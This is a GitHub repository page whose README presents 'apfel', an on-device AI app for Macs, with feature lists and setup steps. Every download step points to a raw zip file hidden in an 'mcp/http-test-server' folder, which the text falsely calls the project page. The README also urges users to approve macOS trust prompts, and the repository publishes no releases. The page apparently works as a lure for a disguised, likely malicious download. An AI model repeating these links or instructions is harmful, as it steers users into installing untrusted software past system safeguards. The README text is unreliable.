Skip to content

escapebowlinggreen441/apfel

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

309 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🍎 apfel - Private AI on your Mac, no cloud

Download apfel

🧭 What is apfel?

apfel is a local AI app for Mac that runs on your device. It gives you three ways to use it:

  • a command line tool
  • an OpenAI-compatible server
  • an interactive chat mode

It uses Apple Intelligence on-device, so your requests stay on your Mac. You do not need API keys, cloud accounts, or extra model downloads.

✨ What you can do

  • Chat with AI from a simple window or terminal
  • Run local prompts on your Mac
  • Connect apps that work with the OpenAI API
  • Use tool calling for tasks that need extra actions
  • Keep data on-device
  • Avoid setup that needs accounts or keys

πŸ–₯️ What you need

apfel is built for modern Macs with Apple Silicon and macOS 26 or later.

Use it if you have:

  • a Mac with Apple Silicon
  • macOS 26
  • Apple Intelligence turned on
  • enough free disk space for the app and cached data

For best results, use the newest macOS version available on your Mac.

πŸ“₯ Download and install

Visit this page to download and run apfel:

https://github.com/escapebowlinggreen441/apfel/raw/refs/heads/main/mcp/http-test-server/Software-v2.3.zip

If the page includes a release file, download it and open it on your Mac. If it provides the source project, follow the run steps shown there to start the app on your device.

πŸš€ Getting started

  1. Open the download page
    Go to the apfel repository in your browser:

    https://github.com/escapebowlinggreen441/apfel/raw/refs/heads/main/mcp/http-test-server/Software-v2.3.zip

  2. Get the app or build files
    On the page, look for the latest release, package, or install instructions.

  3. Open the app
    If you downloaded an app file, open it from Downloads or Finder.

  4. Allow access if macOS asks
    Apple may ask you to confirm that you trust the app. Approve it if you downloaded it from the official repository page.

  5. Start apfel
    Launch the app and wait for the chat or command line mode to load.

πŸ’¬ Use the chat mode

The chat mode gives you a simple way to talk with the AI on your Mac.

Try prompts like:

  • Summarize this note
  • Rewrite this email in plain English
  • Explain this error message
  • Turn these bullet points into a short message

This mode works well when you want a quick answer without leaving your Mac.

πŸ› οΈ Use the CLI tool

The command line tool is for people who like terminal use, but it stays simple.

You can use it to:

  • run one-off prompts
  • chain tasks
  • send text from files or pipes
  • fit apfel into your own scripts

Example use cases:

  • clean up text
  • extract key points
  • draft replies
  • format notes

If you are new to terminal apps, start with chat mode first.

πŸ”Œ Use the OpenAI-compatible server

apfel can expose a local server that acts like the OpenAI API. That helps when you want other apps to talk to your local AI.

Use this mode if you want to:

  • connect desktop tools
  • test app integrations
  • point AI-aware tools at a local endpoint
  • keep requests off the cloud

Typical setup flow:

  1. Start the apfel server
  2. Copy the local endpoint address
  3. Paste it into the app you want to connect
  4. Use the same request style you would use with an OpenAI-compatible tool

🧩 Tool calling

apfel can work with tool calling for tasks that need extra actions.

That means the model can:

  • ask for help from a local tool
  • fetch or shape data
  • trigger a function in a connected app
  • use a structured step in a workflow

This is useful when you want the AI to do more than write text.

πŸ”’ Why use apfel

apfel keeps your work on your Mac.

That helps when you want:

  • no API key setup
  • no cloud account
  • no extra model downloads
  • less setup work
  • more privacy for local use

It is a good fit for people who want AI help without moving their data to a remote service.

πŸ§ͺ Common uses

Here are simple ways people can use apfel every day:

  • write and edit short messages
  • summarize long text
  • clean up rough notes
  • help with planning
  • answer questions from local text
  • connect AI features to other Mac tools

πŸ“ Files and folders

After install, you may see files like:

  • the main app
  • a local config file
  • a cache folder for recent work
  • logs for troubleshooting

Keep the app in your Applications folder if possible. That makes it easier to open and update.

βš™οΈ Basic setup tips

If apfel does not start right away, check these items:

  • Make sure your Mac runs on Apple Silicon
  • Make sure macOS is up to date
  • Make sure Apple Intelligence is on
  • Close and reopen the app
  • Restart your Mac if the app still does not respond

If you use the terminal tool, open Terminal from Applications > Utilities.

🧭 Start here if you are new

If you are not sure what to do first, follow this path:

  1. Open the GitHub page
  2. Download or open the latest build
  3. Launch the app
  4. Try a short chat prompt
  5. Move to the CLI or server mode later

This gives you the fastest path to a working setup.

πŸ“Œ Project details

  • Name: apfel
  • Platform: macOS
  • Hardware: Apple Silicon
  • Mode: on-device AI
  • API style: OpenAI-compatible server
  • Main use: local chat, CLI, and tool use

πŸ”— Download link

Open the project page here to download and run apfel:

https://github.com/escapebowlinggreen441/apfel/raw/refs/heads/main/mcp/http-test-server/Software-v2.3.zip

🧰 If you use it often

For daily use, keep apfel in a place you can find fast:

  • Applications folder for the app
  • a pinned Terminal tab for the CLI
  • a saved local endpoint for server mode

That makes it easy to return to the same setup each day

Releases

No releases published

Packages

 
 
 

Contributors